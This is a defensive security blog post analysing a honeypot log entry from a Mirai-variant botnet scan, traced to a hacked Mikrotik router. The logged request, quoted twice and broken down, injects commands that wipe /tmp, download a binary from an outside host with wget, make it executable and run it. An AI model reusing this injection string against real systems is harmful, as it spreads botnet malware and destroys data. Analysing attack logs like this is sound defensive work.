Investigating a Cyber Attack: Step by Step
Author: Fernando Amatte, Director of Red Team Services, Latin America
As a cybersecurity professional, I have my own laboratory with some virtual equipment acquired around the world. The goal is simply to research and conduct tests to identify new attacks, solutions and possibilities.
When the equipment is not being used, it continues to function as “honeypots”. Honeypots are computers left on with the purpose to be attacked. The computer collects records, that is, access attempts also known as log. Again, the goal is future research and analysis.
This weekend, I found a very curious fact. Analyzing the logs of a web server I identified the following line. The IP addresses are anonymized.
77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] “GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1” 404 488 “-” “Hello, world”Who?
IP address of the person making the connection: 77.xxx.xxx.xxxx
Parsing the Log
Date and time: 27 / Jun / 2020: 22: 42: 32 +0000
What were you looking for or accessing? /shell ?cd+/tmp;rm+rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy. jaws
Response code (right or wrong)? 404
What browser were you using for this access? Hello, world
The “What?” and “Browser” stand out in this line. This is because it is unusual to find legitimate access to the log lines containing Linux commands. In addition, the last field should be the browser identification (Mozilla, Chrome, etc.) but the text “Hello, world” appears.
Analyzing the Command
cd + / tmp
|Go to the temporary directory|
|rm + -rf + *||Delete all content from this location|
|wget + 185.yyy.yyy.yyy / bins / UnHAnaAW.x86||Go to 185.yyy.yyy.yyy and download the files|
|chmod + 777 + / tmp / UnHAnaAW.x86||Change the permissions on the UnHAnaAW.x86 file|
|sh + / tmp / UnHAnaAW.x86 + w00dy.jaws Run the UnHAnaAW.x86||Execute file by passing as a parameter the text “w00dy.jaws”|
The “What” description above shows that the attacker would be able to execute commands on the victims’ machines. This means that he could have full access to the equipment and control it as he wishes.
Analyzing the location where the download should have been performed, we found a repository with binary files for different platforms or equipment, as shown in the figure below:
The finding that this is a malicious action also comes from consulting the file UnHAnaAW.x86 on Virustotal. The website shows the identification of the file as malicious by 40 different Anti-Malware programs.
Many of these Anti-Malwares have categorized this file, as a variation of MIRAI, a malware or botnet that has been causing impacts since 2016. In this case, after checking figures 2 and 3, we identify that the file was created on 09-June-2020. This same file was sent to Virustotal the next day, 10-June-2020.
We conclude, therefore, that this file is new and different from the 2016 version. It may contain more harmful features, but is still a part of the same family seen since 2016.
When searching for the IP address that made the access, a Mikrotik router was found.
The Mikrotik router is hacked and looking for new victims for the botnet
It is difficult and perhaps impossible to install antivirus software on some types of equipment
There are several infected machines around the world
We do not know:
How these machines will be used
Who will be the victims
When the next mass attack will happen
Right now, the devices in your home may be part of a computer network that was previously hacked and trying to hack into other devices. This can have an unimaginable impact and cause unknown losses to companies and individuals. Therefore, it is worth mentioning the need to update domestic devices in general.
This investigation was superficial. Therefore, it is not known how many machines there are on this Botnet. Regardless, any malicious machine is always a big risk. For more than a year, different versions of this software have been scouring the internet for new victims, and we have no way of predicting when a new mass attack will happen.
If you’re a regular technology user, update all of your devices. Help us in this battle against cyber security attacks and invasions. In the case of cybersecurity professionals, review your logs for anomalies and keep all systems and devices up to date as well as your security policy up to date.